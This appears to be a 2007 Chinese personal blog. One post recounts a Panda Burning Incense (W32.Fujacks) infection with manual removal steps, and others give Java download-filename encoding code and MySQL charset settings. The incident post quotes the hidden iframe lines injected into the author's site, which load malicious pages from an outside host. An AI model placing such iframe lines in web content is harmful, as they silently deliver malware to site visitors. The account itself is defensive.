病毒确诊：W32.Fujacks.E

1月8日，中午。
最新进展：确认感染病毒名称为W32.Fujacks.E。诺顿升级到1月7日，可杀该病毒。
在使用诺顿全盘扫描前，一定要手工排除该病毒的运行，方法见5号文章。
绝大部分文件可直接清除病毒，少量文件只能隔离。

病毒影响面扩大

2007年1月6日，病毒影响面扩大。

今天在家休息，偶尔访问前段时间做的网站，居然登陆不了，看了源代码，才发现问题更大。

网站首页被嵌入病毒代码，<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>，百度一下，发现又是那个臭名昭著的"熊猫烧香"病毒干的坏事。

据说还有可能嵌入此代码：<iframe src=http://www.krvkr.com/muma.htm></iframe>

由于网站还未正式上线，不致于带来大面积破坏，还是能吓人一身冷汗的。

看来samba也不能随便用的，否则病毒再嚣张也扩散不到Linux服务器上啊。

一切要等周一看看服务器网页被"插入"多少恶意代码才知道其影响范围，不出意外的话，应该是全部jsp页面全被感染，修改的工作量不会小。

新年过后，有点背

2007年1月5日，周五，新年过后第二个工作日。

今天真点背，早上把手套丢了，座车的时候把手套放在包上，下车的时候就拿了包，没拿手套。
上午10点，突然发现自己机器的防病毒程序没了，然后察看进程，发现"任务管理器"启动不了啦。再然后发现机器上的UltraEdit不能用了，EditPlus不能用了，是因为exe执行程序被人删掉了！
立即进入警惕状态，查！
情况更严重。
1，ghost文件被人删除了。
2，E盘上出现了GameSetup.exe程序。
3，U盘上出现了AutoRun.inf和setup.exe程序。
4，使用哪个exe程序，哪个就不能用，如VC。
5，多个目录中发现了Desktop_.ini文件。
6，天网防火墙无法启动。
7，诺顿防病毒无法启动。
侦查目标指向：Nimaya，Viking，WhBoy。
使用了金山和瑞星的转杀工具，均无效，目前机器仍无法恢复。

在线安装诺顿防病毒，安装失败，后改用下载好的再安装。

手仞"熊猫"病毒的方法：
==========
1. 断开网络

2. 结束病毒进程
%System%\drivers\spoclsv.exe

3. 删除病毒文件：
%System%\drivers\spoclsv.exe

4. 右键点击分区盘符，点击右键菜单中的"打开"进入分区根目录，删除根目录下的文件：
X:\setup.exe
X:\autorun.inf

5. 删除病毒创建的启动项：
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\spoclsv.exe"

6. 修改注册表设置，恢复"显示所有文件和文件夹"选项功能：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001

7. 修复或重新安装反病毒软件

8. 使用反病毒软件或专杀工具进行全盘扫描，清除恢复被感染的exe文件

需按照如下办法处理：
1，手仞病毒。
2，重启电脑。重装norton，升级最新病毒定义。
3，重启电脑，进入安全模式。
4，杀毒，全盘扫描。使用诺顿扫描，使用转杀工具扫描。

截至到今天下班为止，仍然没有修复，其中还经历另一次病毒的反复。可能是因为清除病毒后，没有全面杀毒，运行了一个被感染了病毒的程序造成的。下班的时候再次进入全盘扫描，就回家了，下周一应该会好了。

开篇2007

新的一年，将BLOG迁至此处。

下载文件的中文文件名问题

为何需要自己写下载程序，基本上都是出于安全考虑，而不是基于性能考虑，这里就不详细描述了，只写下在其中遇到的中文文件名问题。

网上有很多这方面资料，基本上都沾边，又不完整。

目前发现主要问题就是IE识别的是utf8编码，而firefox之类的浏览器识别的是ISO8859-1编码。还有一个就是空格的处理，不同浏览器是不一样处理的。另外据说老版本IE有150个字符的问题，经测试在IE6或更高版本中，已经可以自动截断了，这里就不再写处理办法了，其实如果需要处理就是把文件名自己截短即可。

String agentName = request.getHeader("user-agent");
boolean agentBeIE = (agentName!=null && agentName.indexOf("MSIE")>=0);

if (agentBeIE) {
encoding = "UTF-8";
attachFilename = java.net.URLEncoder.encode(saveas_filename, encoding);
attachFilename = attachFilename.replaceAll("\\+", "%20");
}
else {
encoding = "ISO8859_1";
attachFilename = new String(saveas_filename.getBytes("UTF-8"),encoding);
}

response.reset();
response.setCharacterEncoding(encoding);//似乎不起作用
response.setHeader("Content-Type",file_contenttype + ";charset=" + encoding);
response.setHeader("Content-Disposition",(isOnLine?"inline; ":"attachment; ")+"filename=\"" +attachFilename +"\"");
response.setHeader("Cache-Control", "no-cache,must-revalidate");
response.setHeader("Pragma", "no-cache");
response.setContentLength((int) filesize);

ServletOutputStream sout = response.getOutputStream();
byte[] buf = new byte[0x40000]; //256K=2^18=4*2^16
int nNumber=0;
long nTotalRead=0;
while ((nNumber = is.read(buf)) != -1)
{
sout.write(buf, 0, nNumber);
nTotalRead += nNumber;
}
sout.flush(); //输入完毕，清除缓冲
sout.close(); //关闭输出
response.flushBuffer();

中文问题(UTF8:ajax,jsp,java,mysql)

以UTF8编码测试一切顺利。按照前面那篇文章的设置即可，将GBK部分改为UTF8即可。

唯一遇到比较麻烦的是，原来用GBK编码写的jsp代码中的中文，全部变为乱码，需要找一个合适的工具将全部的源码编码修改一遍。

需要补充一点：关于配置文件中default-character-set的设置，还有一个client设置。


[mysql]

default-character-set=gbk


[client]

default-character-set=gbk


[mysqld]

default-character-set=gbk

测试了中文、日文、法文、俄文、阿文等字符的测试，一切顺利。

中文问题(UTF8:ajax,jsp,java,mysql)

以UTF8编码测试一切顺利。按照前面那篇文章的设置即可，将GBK部分改为UTF8即可。

唯一遇到比较麻烦的是，原来用GBK编码写的jsp代码中的中文，全部变为乱码，需要找一个合适的工具将全部的源码编码修改一遍。

需要补充一点：关于配置文件中default-character-set的设置，还有一个client设置。


[mysql]

default-character-set=gbk


[client]

default-character-set=gbk


[mysqld]

default-character-set=gbk

测试了中文、日文、法文、俄文、阿文等字符的测试，一切顺利。